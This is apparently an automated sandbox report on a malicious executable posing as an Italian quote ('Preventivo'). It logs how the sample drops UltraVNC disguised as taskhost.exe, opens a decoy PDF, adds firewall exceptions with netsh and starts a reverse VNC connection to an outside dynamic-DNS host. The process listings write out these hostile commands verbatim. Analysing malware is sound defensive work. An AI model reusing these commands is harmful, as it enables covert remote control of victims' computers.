Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameviewer.exeF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAICustAct.dllF vs Preventivo24.01.11.exe
Source: Preventivo24.01.11.exe Binary or memory string: OriginalFileNameFattura 2 2024.exe: vs Preventivo24.01.11.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Section loaded: lpk.dll Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Uses 32bit PE files
Source: Preventivo24.01.11.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: shi5398.tmp.0.dr Binary string: \Device\NameResTrk\RecordNrtCloneOpenPacket
Source: classification engine Classification label: mal84.rans.troj.evad.winEXE@109/76@4/4
Source: ~.pdf.0.dr Initial sample: http://www.pdf-tools.com\
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B20AF0 FormatMessageW,GetLastError, 0_2_00B20AF0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B54BE0 GetDiskFreeSpaceExW, 0_2_00B54BE0
Source: C:\Games\viewer.exe Code function: 7_2_00963710 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle, 7_2_00963710
Source: C:\Games\viewer.exe Code function: 7_2_009649C0 CoInitialize,CoCreateInstance,VariantInit,IUnknown_QueryService,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error, 7_2_009649C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009EA740 LoadResource,LockResource,SizeofResource, 0_2_009EA740
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
Source: C:\Games\taskhost.exe Mutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_03
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\upd4A5F.tmp Jump to behavior
Source: Preventivo24.01.11.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="taskhost.exe")
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Preventivo24.01.11.exe Virustotal: Detection: 17%
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File read: C:\Users\user\Desktop\Preventivo24.01.11.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Preventivo24.01.11.exe C:\Users\user\Desktop\Preventivo24.01.11.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706007874 " AI_EUIMSI="
Source: unknown Process created: C:\Games\viewer.exe C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1568,i,6034362121281620577,8616152877679475302,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5402254 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706007874 " AI_EUIMSI=" Jump to behavior
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 Jump to behavior
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1568,i,6034362121281620577,8616152877679475302,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5402254 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File written: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UltraVNC.ini Jump to behavior
Source: C:\Games\taskhost.exe File opened: C:\Windows\SysWOW64\RICHED32.DLL
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Preventivo24.01.11.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Preventivo24.01.11.exe Static file information: File size 5955744 > 1048576
Source: Preventivo24.01.11.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x295c00
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Preventivo24.01.11.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Preventivo24.01.11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wininet.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2001663712.0000000009DC9000.00000004.00000020.00020000.00000000.sdmp, shi5398.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdbGCTL source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\Release\UVncVirtualDisplay.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, UVncVirtualDisplay.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb! source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\vnchooks.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: wininet.pdbUGP source: Preventivo24.01.11.exe, 00000000.00000003.2001663712.0000000009DC9000.00000004.00000020.00020000.00000000.sdmp, shi5398.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000007.00000000.2024881140.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000007.00000002.2191085584.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000002.3219378917.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000000.2077749886.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.2183908363.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.2176348607.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000000.2176902084.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000002.2210880368.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr, MSI54C4.tmp.0.dr, MSI5406.tmp.0.dr, MSI54A3.tmp.0.dr
